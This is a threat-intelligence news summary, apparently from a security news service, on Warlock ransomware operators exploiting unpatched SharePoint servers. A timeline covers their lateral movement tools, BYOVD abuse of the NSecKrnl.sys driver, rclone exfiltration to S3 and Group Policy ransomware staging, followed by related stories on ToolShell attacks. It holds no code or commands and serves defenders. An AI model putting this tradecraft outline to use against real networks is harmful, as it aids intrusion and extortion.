Warlock Ransomware Expands SharePoint Intrusions With Stealthier Post-Exploitation
Warlock ransomware operators have continued exploiting unpatched Microsoft SharePoint servers, but recent intrusions show a more mature post-exploitation playbook focused on persistence, lateral movement, and evasion after initial access. Trend Micro reported the group is now using a bring your own vulnerable driver (BYOVD) technique involving the Nsec driver, alongside tools such as TightVNC and the Yuze reverse proxy, to move more quietly across victim networks and reduce the chance of detection. The activity has affected organizations in the technology, manufacturing, and government sectors, with observed victims in the U.S., Germany, and Russia.
Incident details show the operators escalating to full domain compromise by abusing credentials, resetting the built-in Administrator account, and adding users to the Domain Administrators group. They used PsExec, PowerShell Remoting, MSI-based deployment of TightVNC, and RDP-enabling utilities to maintain remote access and spread laterally, while web shells, tunneling, and other remote-control mechanisms supported persistence and command-and-control. The reporting indicates Warlock has kept its SharePoint exploitation path consistent, but has significantly strengthened the actions that follow compromise, giving defenders a clearer set of behaviors to hunt for beyond the initial server exploit.
Timeline
Mar 16, 2026
Trend Micro publishes analysis of Warlock’s enhanced tradecraft
Trend Micro disclosed details of the January 2026 intrusion, describing Warlock’s improved post-exploitation methods, expanded toolset, and use of stealthy tunneling and BYOVD techniques.
Jan 20, 2026
Ransomware execution drops lockdatareadme.txt note
The attack’s impact phase culminated in ransomware execution across the environment, after which a ransom note named lockdatareadme.txt was dropped on affected systems.
Jan 19, 2026
Warlock stages ransomware via SYSVOL, NETLOGON, and Group Policy
The operators placed ransomware components in SYSVOL and NETLOGON shares and configured Active Directory Group Policy startup scripts to execute the RunCryptor export from run.dll across the enterprise.
Jan 18, 2026
Data is exfiltrated to an attacker-controlled S3 bucket
Before ransomware deployment, the intruders used a renamed rclone binary, TrendFileSecurityCheck.exe, to steal data from the victim network and transfer it to an attacker-controlled Amazon S3 bucket.
Jan 17, 2026
Warlock uses BYOVD to disable security tools
The attackers abused the vulnerable NSecKrnl.sys driver in a bring-your-own-vulnerable-driver technique, using a renamed loader called TrendSecurity.exe to impair security products across the environment.
Jan 16, 2026
Attackers expand persistence, lateral movement, and covert access
During the intrusion, the operators used PsExec, PowerShell Remoting, TightVNC, Velociraptor, VS Code CLI tunneling, Cloudflare Tunnel, Yuze, and RDP patching to move laterally and maintain multiple redundant access and command-and-control channels.
Jan 15, 2026
Warlock compromises a victim network in a January 2026 intrusion
In January 2026, Warlock gained access to a victim environment and remained inside for about 15 days. The intrusion ultimately resulted in full domain-level control and preparation for enterprise-wide ransomware deployment.
Dec 31, 2025
Warlock continues exploiting unpatched SharePoint servers for initial access
Warlock, also tracked as Water Manaul, continued using known Internet-facing Microsoft SharePoint vulnerabilities for intrusion, including CVE-2025-49706, CVE-2025-49704, CVE-2025-53770, and CVE-2025-53771. Researchers linked the group’s initial access activity to SharePoint worker processes.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Sources
Related Stories
Warlock Ransomware Attacks US Firms via SharePoint Zero-Day Linked to Chinese CamoFei APT
Warlock ransomware was deployed against US firms through the exploitation of a zero-day vulnerability in Microsoft SharePoint, identified as CVE-2025-53770. The attacks have been attributed to the China-based CamoFei APT group, with evidence indicating that the threat actor leveraged the ToolShell exploit to gain initial access and deploy both Warlock and LockBit ransomware payloads. The campaign is notable for its use of DLL sideloading and a custom command and control framework referred to as `ak47c2`, as well as the bundling of multiple ransomware payloads in a single attack. Security researchers have traced the origins of the Warlock ransomware to activity dating back to 2019, suggesting that the group behind it is not new but has evolved its tactics. The operation stands out because, unlike most ransomware campaigns typically associated with Russian actors, Warlock is linked to Chinese threat groups, including Budworm (APT27), Sheathminer (APT31), and Storm-2603. The attacks highlight a growing trend of Chinese APTs engaging in financially motivated ransomware operations targeting Western organizations.
1 months ago
Widespread Exploitation of Microsoft SharePoint ToolShell Vulnerability by Chinese-Linked Threat Actors
Hackers believed to be associated with China have exploited the ToolShell vulnerability (CVE-2025-53770) in Microsoft SharePoint, targeting a broad range of organizations across multiple continents. The vulnerability, which affects on-premise SharePoint servers, was disclosed as an actively exploited zero-day on July 20, 2025, prompting Microsoft to release emergency patches the following day. The flaw is a bypass for previously reported vulnerabilities (CVE-2025-49706 and CVE-2025-49704) and allows remote, unauthenticated attackers to execute code and gain full access to the file system. Multiple Chinese threat groups, including Budworm/Linen Typhoon, Sheathminer/Violet Typhoon, and Storm-2603/Warlock ransomware, have been linked to these attacks. Symantec reported that the ToolShell exploit was used to compromise organizations in the Middle East, South America, the United States, Africa, and Europe, with targets including government agencies, universities, telecommunications providers, and financial institutions. In one case, attackers exploited the vulnerability to plant webshells for persistent access, followed by the deployment of a Go-based backdoor named Zingdoor and the ShadowPad Trojan, both of which facilitate remote command execution and data exfiltration. Storm-2603, a financially motivated group, was observed deploying ransomware such as LockBit Black and WarLock/X2anylock by exploiting the same set of SharePoint vulnerabilities, with major activity noted on July 18, 2025. Their operations targeted organizations in Latin America and the APAC region, using a combination of public-facing application exploits and legitimate tools like PsExec for lateral movement and execution. The attacks highlight the critical risk posed by unpatched SharePoint servers, as attackers were able to gain initial access, establish persistence, and deploy sophisticated malware and ransomware payloads. The campaigns demonstrate a high level of coordination and technical capability, leveraging zero-day exploits and advanced post-exploitation techniques. The breach of the National Nuclear Security Administration’s Kansas City National Security Campus further underscores the severity of these attacks, as foreign actors exploited the same SharePoint vulnerabilities to infiltrate a facility responsible for manufacturing critical components for US nuclear weapons. The incident at the Kansas City plant raised significant concerns about the security of federal IT and OT systems, especially those supporting national security functions. Despite the high-profile nature of the targets, responses from affected organizations and government agencies have been limited, with some declining to comment on the incidents. The rapid release of patches by Microsoft and the subsequent widespread exploitation illustrate the importance of timely vulnerability management and the need for robust security controls around public-facing applications. Security researchers have emphasized the necessity for organizations to validate their defenses against these specific TTPs and to continuously monitor for signs of compromise related to the ToolShell exploit. The attacks serve as a stark reminder of the persistent threat posed by state-linked actors and the critical importance of securing enterprise collaboration platforms like SharePoint.
3 weeks ago
Ransomware Attack Uncovers Ongoing Espionage in Russian Organizations
Two Russian organizations were simultaneously targeted by separate cyber attack groups, resulting in the exposure of a long-term espionage campaign. The first group, QuietCrabs, believed to be of Asian origin, focused on cyber espionage and maintained a stealthy presence within the victim networks. The second group, known as Thor, attempted to deploy LockBit and Babuk ransomware but was detected early, which inadvertently led to the discovery of QuietCrabs' ongoing activities. Both groups exploited known vulnerabilities in Microsoft SharePoint Server (CVE-2025-53770) and various Ivanti solutions (CVE-2024-21887, CVE-2025-4427, CVE-2025-4428, CVE-2023-38035) to gain initial access. QuietCrabs utilized an ASPX web shell, KrustyLoader malware, and the Sliver C2 implant for persistence and control, while Thor employed tools such as ADRecon, GodPotato, Secretsdump, Mimikatz, Tactical RMM, MeshAgent, and Rclone for lateral movement, privilege escalation, and data exfiltration. The investigation began after Thor's activity was detected, which prevented the ransomware deployment but also revealed the deeper, more persistent espionage threat posed by QuietCrabs. This incident highlights the risk of multiple, unconnected threat actors targeting the same organization and the potential for noisy attacks to expose more covert operations.
1 months ago